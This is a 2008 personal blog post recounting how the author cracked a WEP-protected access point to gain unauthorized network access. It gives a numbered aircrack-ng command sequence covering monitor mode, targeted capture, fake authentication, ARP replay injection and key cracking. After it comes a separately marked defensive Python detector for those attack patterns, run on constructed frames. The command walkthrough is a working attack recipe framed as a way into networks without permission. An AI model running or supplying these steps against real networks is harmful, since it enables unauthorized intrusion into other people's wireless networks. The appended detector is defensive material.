Thursday, May 8, 2008

My first experience in WEP hacking

For years I have been thinking and wondering how to hack an AP to get unauthorized access into a wireless network.

I finally did it. Thanks to a friend who provided me with supported hardware (WG2000 with the zd1211 chipset) and another friend who is a kernel hacking expert :)

Here is the operating system environment:

FedoraCore 6 (kernel version 2.6.23.17)

- ieee80211.patch

- zd12111_firmware1.4

- zd1211rw.patch
Hacking WEP steps:

0. Enable the wireless adaptor in monitor mode
-> airmon-ng start [adaptor_interface]
-> airmon-ng start wlan0

1. View surrounding APs
-> airodump-ng
-> airodump-ng wlan0

2. Target a single AP and channel, then start capturing packets
-> airodump-ng -c [channel] --bssid [ap_mac] -w [outfilename] [adaptor_interface]

3. Do fake authentication
-> aireplay-ng -1 0 -e [ap_name] -a [ap_mac] -h [adaptor_mac] [adaptor_interface]

4. Keep the fake authentication alive
-> aireplay-ng -1 6000 -o 1 -q 10 -e [ap_name] -a [ap_mac] -h [adaptor_mac] [adaptor_interface]

5. Inject packets with the ARP request replay attack
-> aireplay-ng -3 -b [ap_mac] -h [adaptor_mac] [adaptor_interface]

6. Crack the AP key from the .cap file
-> aircrack-ng -z -b [ap_mac] [outfilename].cap
-> aircrack-ng -b [ap_mac] [outfilename].cap

Steps 5 and 6 can be executed in parallel :D
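As an added example from the defender's side (not part of the original post), here is a small Python detector for the two on-air patterns that steps 3 to 5 above produce: a station that keeps authenticating but never associates, and a very high-rate ARP stream from a single source. The frame summaries and MAC addresses are constructed, and the thresholds are assumptions to tune per network.

```python
from collections import defaultdict

# Constructed sample of 802.11 frame summaries in the shape a wireless
# monitoring sensor might export: (seconds, kind, source_mac, bssid).
# Not captured traffic; the MAC addresses are placeholders.
FRAMES = (
    # a normal client: one authentication, one association, occasional ARP
    [(0.0, "auth", "00:11:22:33:44:55", "AA:BB:CC:DD:EE:FF"),
     (0.2, "assoc", "00:11:22:33:44:55", "AA:BB:CC:DD:EE:FF"),
     (5.0, "arp", "00:11:22:33:44:55", "AA:BB:CC:DD:EE:FF")]
    # kept-alive fake auth: re-authenticates every 10 s, never associates
    + [(10.0 * i, "auth", "66:77:88:99:AA:BB", "AA:BB:CC:DD:EE:FF")
       for i in range(1, 7)]
    # ARP replay injection: hundreds of ARP frames per second from one source
    + [(30.0 + i / 400.0, "arp", "66:77:88:99:AA:BB", "AA:BB:CC:DD:EE:FF")
       for i in range(2000)]
)


def detect_wep_attack_patterns(frames, auth_repeat=3, arp_per_second=50.0):
    """Return alerts as (pattern, source_mac, bssid, count) tuples.
    auth_repeat and arp_per_second are assumed thresholds."""
    auth_count = defaultdict(int)   # (src, bssid) -> authentication frames
    assoc_seen = set()              # (src, bssid) pairs that associated
    arp_times = defaultdict(list)   # (src, bssid) -> ARP frame timestamps
    for ts, kind, src, bssid in frames:
        key = (src, bssid)
        if kind == "auth":
            auth_count[key] += 1
        elif kind == "assoc":
            assoc_seen.add(key)
        elif kind == "arp":
            arp_times[key].append(ts)
    alerts = []
    for key, n in auth_count.items():
        if n >= auth_repeat and key not in assoc_seen:
            alerts.append(("repeated-auth-no-assoc", key[0], key[1], n))
    for key, times in arp_times.items():
        span = max(times) - min(times)
        # rate over the observed window, never shorter than one second
        if len(times) > 1 and len(times) / max(span, 1.0) >= arp_per_second:
            alerts.append(("arp-replay-rate", key[0], key[1], len(times)))
    return alerts


if __name__ == "__main__":
    for alert in detect_wep_attack_patterns(FRAMES):
        print(alert)
```

The legitimate client in the sample triggers nothing; only the second station is reported, once for each pattern.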
